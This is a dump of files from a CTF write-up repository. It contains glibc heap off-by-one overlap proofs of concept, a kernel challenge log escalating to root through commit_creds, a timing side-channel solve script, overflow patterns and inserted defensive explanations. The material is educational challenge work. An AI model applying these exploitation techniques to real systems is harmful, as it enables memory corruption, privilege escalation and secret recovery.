    long libc_base = T[0] - 0x3c3b78;
    long heap_base = T[1];
    printf("Base Address of Libc: %lx\n",libc_base);
    printf("Base Address of Heap: %lx\n",heap_base);
    return 0;
}
--------------------------------------------------------------------------------
/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/enlarge_poc.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(){

    void *V = malloc(0x18); // vulnerable object
    void *A = malloc(0xf0); // chunk size 0x100, not fastbin
    char *T = (char*)malloc(0x10); // target
    strcpy(T, "Target");
    printf("T: %s\n", T);
    free(A);
    memcpy(V, "AAAAAAAAAAAAAAAAAAAAAAAA\x21",0x19); // off-by-one, enlarge sizeof A to 0x120
    char *B = (char*)malloc(0x110); //malloc B overlapping T
    strcpy(B+0x100, "Corrupted!"); // corrupt T
    printf("T: %s\n", T);
    return 0;
}
--------------------------------------------------------------------------------
/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_01.png
--------------------------------------------------------------------------------
/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_02.png
--------------------------------------------------------------------------------
/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_03.png
--------------------------------------------------------------------------------
/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_04.png
--------------------------------------------------------------------------------
/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_05.png
--------------------------------------------------------------------------------
/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/readme.md:
--------------------------------------------------------------------------------
# New Exploit Methods against Ptmalloc of GLIBC

The code and content are taken from [New Exploit Methods against Ptmalloc of GLIBC](http://ieeexplore.ieee.org/document/7847004/).

This repo is the note I made while reading through the paper and running the examples with GDB.

To compile the examples as in the paper, we can run

```bash
gcc *.c -fpie -pie
```

From the paper:

The object V represents the vulnerable object and the object T represents the hypothesized target object. We prove the success of attack by corrupting the contents of T.

# Code 4: Nonadjacent Free Chunk Consolidation Attack

Use [consol_poc1.c](consol_poc1.c)


```C++
void *V = malloc(0x18); // vulnerable object
void *A = malloc(0xf0); // chunk size 0x100, not fastbin
char *T = (char*)malloc(0x10); // target
void *B = malloc(0xf0); // chunk size 0x100, not fastbin
```
![alt text](image/04_01.png)

```C++
free(B);
```
![alt text](image/04_02.png)

```C++
memcpy(V, "AAAAAAAAAAAAAAAAAAAAAAAA\x21",0x19); // off-by-one, enlarge sizeof A to 0x120
```
![alt text](image/04_03.png)
```C++
free(A); // force nonadjacent consolidation with B
char *C = (char*)malloc(0x110); // malloc C, overlapping T
```
![alt text](image/04_04.png)
```C++
strcpy(C+0x100, "Corrupted!");
```
![alt text](image/04_05.png)
--------------------------------------------------------------------------------
/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/shrink_poc.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
    char *V = (char*)malloc(0x18); //vulnerable object
    void *A = malloc(0x400); // chunk size 0x410, not fastbin
    void *B = malloc(0xf0); // chunk size 0x100, not fastbin
    free(A);
    strcpy(V, "AAAAAAAAAAAAAAAAAAAAAAAA"); //null byte off by 1, shrink size of A to 0x400
    void *A1 = malloc(0xf0);
    char *T = (char*)malloc(0x10); // target
    strcpy(T, "Target");
    printf("T: %s\n", T);
    free(A1);
    free(B); // force consolidation with A1
    char *C = (char*)malloc(0x400); // malloc C, overlapping T
    strcpy(C+0x100, "Corrupted!");
    printf("T: %s\n", T);
    return 0;
}
--------------------------------------------------------------------------------
/heap/reference/20170604ssmjp-170604135916.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/20170604ssmjp-170604135916.pdf
--------------------------------------------------------------------------------
/heap/reference/Glibc_Adventures-The_Forgotten_Chunks.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/Glibc_Adventures-The_Forgotten_Chunks.pdf
--------------------------------------------------------------------------------
/heap/reference/bh-usa-07-ferguson-WP.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/bh-usa-07-ferguson-WP.pdf
--------------------------------------------------------------------------------
/heap/reference/glibcmalloc-110710054847-phpapp01.ppt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/glibcmalloc-110710054847-phpapp01.ppt
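Every PoC in the ptmalloc note above (consol_poc1.c, consol_poc2.c, enlarge_poc.c, enlarge_infoleak_poc.c, shrink_poc.c) turns on a single byte landing in the next chunk's size field. The following is an added example, not from the paper and not from this repo: a byte-array model of the glibc chunk header (8-byte prev_size, 8-byte size whose low three bits are flags) laid out with the chunk sizes of consol_poc1.c, so the effect of the 0x19-byte write can be inspected without touching the real allocator. `sim_walk` reads the arena the way free()'s consolidation path or a heap-integrity check does, purely from the size fields; after the overflow it reports A as 0x120 bytes and no longer sees T as a chunk at all. The function names, the 0x400-byte model arena and the chunk offsets are assumptions of this example.

```c
/* Added example, not from the paper or this repo: a byte-array model of the
 * glibc chunk header, laid out with the chunk sizes of consol_poc1.c
 * (V 0x20, A 0x100, T 0x20, B 0x100, then the top chunk). Offsets are relative
 * to the start of the model arena; nothing here touches the real allocator. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define PREV_INUSE 0x1UL
#define SIZE_MASK  (~0x7UL)
#define HDR_USER   0x10          /* user pointer = chunk address + 0x10 */
#define HEAP_LEN   0x400         /* size of the model arena (assumption) */

static uint8_t heap[HEAP_LEN];

/* chunk offsets of the four PoC allocations, in allocation order */
enum { OFF_V = 0x00, OFF_A = 0x20, OFF_T = 0x120, OFF_B = 0x140 };

static size_t rd_size(size_t off) { size_t s; memcpy(&s, heap + off + 8, 8); return s; }
static void   wr_size(size_t off, size_t s) { memcpy(heap + off + 8, &s, 8); }

/* Lay out V, A, T, B and a top chunk, all with PREV_INUSE set. */
void sim_layout(void)
{
    memset(heap, 0, sizeof heap);
    wr_size(OFF_V, 0x020 | PREV_INUSE);
    wr_size(OFF_A, 0x100 | PREV_INUSE);
    wr_size(OFF_T, 0x020 | PREV_INUSE);
    wr_size(OFF_B, 0x100 | PREV_INUSE);
    wr_size(OFF_B + 0x100, (HEAP_LEN - (OFF_B + 0x100)) | PREV_INUSE);  /* top */
}

/* The vulnerable write: len bytes into a chunk's user area with no bound,
 * modelling the memcpy(V, ..., 0x19) of the PoCs. */
void sim_write_user(size_t chunk_off, const void *data, size_t len)
{
    memcpy(heap + chunk_off + HDR_USER, data, len);
}

size_t sim_chunk_size(size_t off) { return rd_size(off) & SIZE_MASK; }
int    sim_prev_inuse(size_t off) { return (int)(rd_size(off) & PREV_INUSE); }

/* Walk the arena using only the size fields, as consolidation and a heap
 * integrity checker do. Returns the number of chunks seen; stops early on a
 * size that is too small or runs past the arena (a corrupted size field). */
size_t sim_walk(size_t *sizes_out, size_t max)
{
    size_t n = 0;
    for (size_t off = 0; off < HEAP_LEN && n < max; ) {
        size_t sz = sim_chunk_size(off);
        if (sz < 0x20 || off + sz > HEAP_LEN)
            break;
        sizes_out[n++] = sz;
        off += sz;
    }
    return n;
}

/* Which chunk (by offset) owns the byte at target, according to the walk.
 * Returns (size_t)-1 if the walk cannot reach it. */
size_t sim_owner(size_t target)
{
    for (size_t off = 0; off < HEAP_LEN; ) {
        size_t sz = sim_chunk_size(off);
        if (sz < 0x20 || off + sz > HEAP_LEN)
            return (size_t)-1;
        if (target >= off && target < off + sz)
            return off;
        off += sz;
    }
    return (size_t)-1;
}

int main(void)
{
    size_t sizes[8];
    sim_layout();
    size_t n = sim_walk(sizes, 8);
    printf("before: %zu chunks, A=0x%zx, T owned by chunk 0x%zx\n",
           n, sizes[1], sim_owner(OFF_T));

    /* consol_poc1.c: 0x18 bytes of 'A' plus one 0x21 byte land on A's size. */
    uint8_t payload[0x19];
    memset(payload, 'A', 0x18);
    payload[0x18] = 0x21;
    sim_write_user(OFF_V, payload, sizeof payload);

    n = sim_walk(sizes, 8);
    printf("after:  %zu chunks, A=0x%zx, T owned by chunk 0x%zx, prev_inuse(A)=%d\n",
           n, sizes[1], sim_owner(OFF_T), sim_prev_inuse(OFF_A));
    return 0;
}
```

The same model explains shrink_poc.c: a NUL written into the low byte of a 0x411 size field leaves 0x400, which both shrinks the chunk and clears PREV_INUSE, so the allocator then believes the preceding chunk is free. A checker that re-walks the arena after every call and compares the sizes it finds against the sizes it handed out would flag both corruptions at the first walk, which is the detection idea behind the heap-verification options of debugging allocators.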
-------------------------------------------------------------------------------- /heap/reference/glibc内存管理ptmalloc源代码分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/glibc内存管理ptmalloc源代码分析.pdf -------------------------------------------------------------------------------- /heap/reference/malloc-150821074656-lva1-app6891.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/malloc-150821074656-lva1-app6891.pdf -------------------------------------------------------------------------------- /heap/reference/ptmalloc_camera.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/reference/ptmalloc_camera.pdf -------------------------------------------------------------------------------- /heap/reference/readme.md: -------------------------------------------------------------------------------- 1 | https://www.win.tue.nl/~aeb/linux/hh/hh-11.html 2 | 3 | http://acez.re/the-weak-bug-exploiting-a-heap-overflow-in-vmware/ 4 | 5 | https://www.zerodayinitiative.com/blog/2017/6/26/use-after-silence-exploiting-a-quietly-patched-uaf-in-vmware 6 | 7 | https://papers.put.as/papers/macosx/2016/Summercon-2016.pdf 8 | 9 | https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/jia 10 | -------------------------------------------------------------------------------- /hidden_writing.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | #ice_ctf also got one 3 | 4 | import Image 5 | 6 | img = Image.open('ifs.bmp') 7 | 8 | X = img.size[0] 9 | Y = img.size[1] 10 | 11 | print X,Y 12 | 13 | 
for i in range(X-2): 14 | for j in range(Y-2): 15 | a = img.getpixel((i,j))[0]+img.getpixel((i,j))[1]+img.getpixel((i,j))[2] 16 | b = img.getpixel((i,j+1))[0]+img.getpixel((i,j+1))[1]+img.getpixel((i,j+1))[2] 17 | c = img.getpixel((i,j+2))[0]+img.getpixel((i,j+2))[1]+img.getpixel((i,j+2))[2] 18 | if (a > b and c > b) or (a < b and c < b): 19 | pass 20 | else: 21 | img.putpixel((i,j),(255,255,255)) 22 | 23 | img.show() 24 | -------------------------------------------------------------------------------- /kernel/hacklu_2018_babykernel/baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/kernel/hacklu_2018_babykernel/baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.7z -------------------------------------------------------------------------------- /kernel/hacklu_2018_babykernel/readme.md: -------------------------------------------------------------------------------- 1 | Finding address to call commit_creds(prepare_kernel_cred(0)); and make it become root 2 | 3 | Reference: 4 | 5 | https://devcraft.io/2018/04/25/blazeme-blaze-ctf-2018.html 6 | 7 | 8 | Solving logs: 9 | 10 | ``` 11 | qemu-system-x86_64 -monitor /dev/null -m 64 -nographic -kernel "bzImage" -initrd initrd.cpio -append "console=ttyS0 init='/init'" 12 | 13 | 14 | ffffffff8104602b: e8 20 8e 00 00 callq ffffffff8104ee50 15 | 0xffffffff8104ee50 : 16 | 18446744071579168336 17 | 18 | 19 | ffffffff8103c0fe: e8 cd 28 01 00 callq ffffffff8104e9d0 20 | 21 | 22 | 18446744071579167184 23 | 24 | ffff88000212c000 25 | 26 | ----- Menu ----- 27 | 1. Call 28 | 2. Show me my uid 29 | 3. Read file 30 | 4. Any hintz? 31 | 5. Bye! 32 | > 1 33 | 1 34 | I need a kernel address to call. Be careful, though or we will crash horribly... 35 | > 36 | 18446744071579168336 37 | 18446744071579168336 38 | There is a good chance we will want to pass an argument. 
Which one is it? 39 | > 40 | 0 41 | 0 42 | random: fast init done 43 | Got call address: 0xffffffff8104ee50, argument: 0x0000000000000000 44 | flux_baby ioctl nr 900 called 45 | flux_baby ioctl nr 900 called 46 | flux_baby ioctl extracted param ffffffff8104ee50 as function ptr, calling it 47 | A miracle happened. We came back without crashing! I even got a return value for you. 48 | It is: ffff88000212cb40 49 | ----- Menu ----- 50 | 1. Call 51 | 2. Show me my uid 52 | 3. Read file 53 | 4. Any hintz? 54 | 5. Bye! 55 | > 1 56 | 1 57 | I need a kernel address to call. Be careful, though or we will crash horribly... 58 | > 59 | 18446744071579167184 60 | 18446744071579167184 61 | There is a good chance we will want to pass an argument. Which one is it? 62 | > 63 | 18446612132349004608 64 | 18446612132349004608 65 | Got call address: 0xffffffff8104e9d0, argument: 0xffff88000212cb40 66 | flux_baby ioctl nr 900 called 67 | flux_baby ioctl nr 900 called 68 | flux_baby ioctl extracted param ffffffff8104e9d0 as function ptr, calling it 69 | A miracle happened. We came back without crashing! I even got a return value for you. 70 | It is: 0000000000000000 71 | ----- Menu ----- 72 | 1. Call 73 | 2. Show me my uid 74 | 3. Read file 75 | 4. Any hintz? 76 | 5. Bye! 77 | > 2 78 | 2 79 | uid=0(root) gid=0(root) 80 | ----- Menu ----- 81 | 1. Call 82 | 2. Show me my uid 83 | 3. Read file 84 | 4. Any hintz? 85 | 5. Bye! 86 | > 3 87 | 3 88 | Which file are we trying to read? 89 | > ./flag 90 | ./flag 91 | Here are your 0x40 bytes contents: 92 | flag{well_done_this_is_how_every_kernel_exploit_eventually_goes} 93 | ----- Menu ----- 94 | 1. Call 95 | 2. Show me my uid 96 | 3. Read file 97 | 4. Any hintz? 98 | 5. Bye! 
99 | ``` 100 | -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/1.png -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/2.png -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/3.png -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/4.png -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/ida.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/ida.png -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/nanase.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/nanase.png -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/readme.md: -------------------------------------------------------------------------------- 1 | # SHA2017 CTF Rev100 Suspect File 1 2 | 3 | **Description:** 4 | 5 | >Suspect File 1 (100) - 63 solves 6 | > 7 | >We found some software on our suspects development server, it looks like they created some different versions, are you able to crack the >software? 8 | > 9 | >Challenge created by the Digital and Biometric Traces division of the Netherlands Forensic Institute. 10 | > [suspectfile1.tgz](./suspectfile1.tgz) 220f680d2b441c43163065dc779a450b 11 | 12 | # Writeup 13 | 14 | 第一次寫writeup,呢條只係sanity check,然而我用左1個鐘頭寫同debug angr script,再用左個半鐘頭 update angr :0) 15 | 16 | 首先Ida 左佢先 17 | 18 | ![alt text](ida.png) 19 | 20 | 見到都反胃x_x 21 | 22 | F5 code 23 | Conditions for output "Yes!" 24 | 25 | ```C++ 26 | ......... 
27 | } 28 | while ( v10 != -915395067 ); 29 | puts("Yes!"); 30 | return 0; 31 | } 32 | 33 | 34 | ``` 35 | 由於冇scanf,估計要pass一個argv令v10==-915395067 36 | 37 | 38 | gdb係sorry() set breakpoint 39 | 40 | ![alt text](1.png) 41 | 42 | call sorry()之前嘅stack 43 | 44 | ![alt text](2.png) 45 | 46 | pass左一個事實落去做argv 47 | 48 | ![alt text](3.png) 49 | 50 | 唔小心汁走左支flag ^_^ 51 | 52 | ![alt text](4.png) 53 | 54 | 七瀨大法好 55 | 56 | ![alt text](nanase.png) 57 | 58 | 估計係因為中間太多while,所以angr爆炸,估計要z3解先得 59 | 60 | 唉 終於解到題~~~~~~~ 61 | 62 | -------------------------------------------------------------------------------- /misc/SHA2017 CTF Rev100 Suspect File 1/suspectfile1.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/misc/SHA2017 CTF Rev100 Suspect File 1/suspectfile1.tgz -------------------------------------------------------------------------------- /misc/VXCTF 2nd Flag Checking Oracle 2/fco_v2.0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import random 3 | import sys 4 | import os 5 | import time 6 | 7 | f = open("flag.txt", "r") 8 | flag = f.read() 9 | 10 | print """ 11 | Welcome to the flag checking oracle. You can check if your flag is the same as 12 | mine! Previous version has a bug and was already fixed now! Same as before, I 13 | will not let you to brute force that easily... Enjoy and Wait alone!HAHA! 14 | """ 15 | 16 | while 1: 17 | print "Enter your guess:" 18 | x = sys.stdin.readline()[:-1] 19 | match = True 20 | while(len(x)!=len(flag)): 21 | print "Wrong! Try again." 22 | print "Enter your guess:" 23 | x = sys.stdin.readline()[:-1] 24 | for i in range(len(x)): 25 | time.sleep(0.5) 26 | if x[i] != flag[i]: 27 | match = False 28 | print "Wrong! Try again." 29 | break 30 | if match == True: 31 | break 32 | 33 | print "Correct!" 
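The oracle in fco_v2.0.py compares the guess one character at a time, sleeps 0.5 s per compared character and stops at the first mismatch, so the response time tells a caller how long the correct prefix is. The following is an added example, not part of the challenge or this repo: it mirrors that leaky comparison beside a constant-time replacement; the flag value is a constructed sample and the function names are my own.

```python
import hashlib
import hmac
import time

# Constructed sample flag for this demo; not the challenge's real flag.
FLAG = "vxctf{s4mpl3_fl4g}"


def leaky_check(guess, flag=FLAG, delay=0.0):
    """Same logic as fco_v2.0.py: compare one character at a time, sleep
    `delay` seconds per comparison and stop at the first mismatch.

    Returns (matched, characters_compared).  The second value is exactly what
    a remote caller learns from the response time (0.5 s per compared
    character in the challenge), which is why the flag can be recovered one
    character at a time.
    """
    if len(guess) != len(flag):
        return False, 0
    compared = 0
    for g, f in zip(guess, flag):
        time.sleep(delay)
        compared += 1
        if g != f:
            return False, compared
    return True, compared


def leaked_prefix_length(guess, flag=FLAG):
    """Number of leading characters the leaky oracle confirms as correct for a
    guess: every comparison except the failing one."""
    matched, compared = leaky_check(guess, flag)
    if matched or compared == 0:
        return compared
    return compared - 1


def constant_time_check(guess, flag=FLAG):
    """Hardened version.  Both values are hashed to a fixed length first, so
    neither the guess length nor the position of the first mismatch changes
    the work done; hmac.compare_digest then compares the digests in time
    independent of their contents.
    """
    g = hashlib.sha256(guess.encode()).digest()
    f = hashlib.sha256(flag.encode()).digest()
    return hmac.compare_digest(g, f)


if __name__ == "__main__":
    for guess in [FLAG, "vxctf{sXmpl3_fl4g}", "short"]:
        print(guess, leaky_check(guess), leaked_prefix_length(guess),
              constant_time_check(guess))
```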
--------------------------------------------------------------------------------
/misc/VXCTF 2nd Flag Checking Oracle 2/readme.md:
--------------------------------------------------------------------------------
# VXCTF 2nd Flag Checking Oracle 2


# Challenge:

>Flag Checking Oracle 2
>Last time there is a bug in our flag checking oracle. This time the bug is fixed, what can you do? Hahahaaa
>
>
>[fco_v2.0.py](fco_v2.0.py)


The challenge is simple, but writing the script is a bit of a hassle.

From reading the code, roughly:

1. If the input length equals the flag length, there is an extra 0.5 s of sleep time.

2. Each correct character adds roughly another 0.5 s of sleep time.


After a small hint from the challenge author, I found that pwntools has tools for measuring latency; after a few rounds of trial and error I started sending to the server.

After waiting about an hour and a half, I had the flag.

# Code:

[solve.py](solve.py)
--------------------------------------------------------------------------------
/misc/VXCTF 2nd Flag Checking Oracle 2/solve.py:
--------------------------------------------------------------------------------
from pwn import *


host = "58.152.223.96"
port = 8001


# vxctf{3nj0y_4nd_w417_a10ne}

r = remote(host, port)

char_set = "!@#$%^&*()-_0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

payload = 'vxctf{3nj0y_4nd_w417_1XAAA}'


# start from 6
correct = 19

wrong = 27 - correct

r.recvuntil('Enter your guess:')
r.sendline(payload)

# got 0.1s latency
char_pointer = 0

while (wrong):
    # The server sleeps 0.5 s per compared character, so if "Wrong!" does not
    # arrive within the time expected for `correct` characters, the character
    # at position `correct` was right as well.
    if (r.recvuntil('Wrong! Try again.', timeout=((0.6) + correct * 0.5)) == b''):
        char_pointer = 0
        correct += 1
        wrong -= 1

        print(payload)
        r.recvuntil('Enter your guess:')
        r.sendline(payload)

    else:
        # Mismatch: try the next candidate character at position `correct`.
        payload = payload[:correct] + char_set[char_pointer] + payload[correct+1:]

        char_pointer += 1

        print(payload + ' failed')

        r.recvuntil('Enter your guess:')

        r.sendline(payload)


## 27
--------------------------------------------------------------------------------
/misc/polictf2017 Status box-120/statusbox.py:
--------------------------------------------------------------------------------
from pwn import *
from time import sleep

host = "statusbox.chall.polictf.it"
port = 31337

s = remote(host, port)
## flag{g00d_0ld_m1ss1ng_ch3cks!}
## loop 14 times
count = 0
while (count < 14):

    print(s.recv(4096))

    s.sendline("3")

    print(s.recv(4096))

    s.send("\n")

    print(s.recv(4096))

    s.sendline("0")

    count += 1
    # payload="a"*1023

    print("-----------------------ok-----------------------")

    print(count)
    sleep(1)

s.interactive()
--------------------------------------------------------------------------------
/pattc_list.txt:
--------------------------------------------------------------------------------
pattc 50:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA

pattc 80:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4A

pattc 100:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

pattc 120:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAA

pattc 150:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA


pattc 200:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA


pattc 300:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/0.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/0.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/1.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/10.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/10.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/11.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/11.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/12.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/12.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/13.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/13.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/14.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/14.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/15.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/15.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/2.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/3.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/4.jpg
--------------------------------------------------------------------------------
/web/UIUCTF/Bot_Protection_IV/5.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/5.jpg
--------------------------------------------------------------------------------
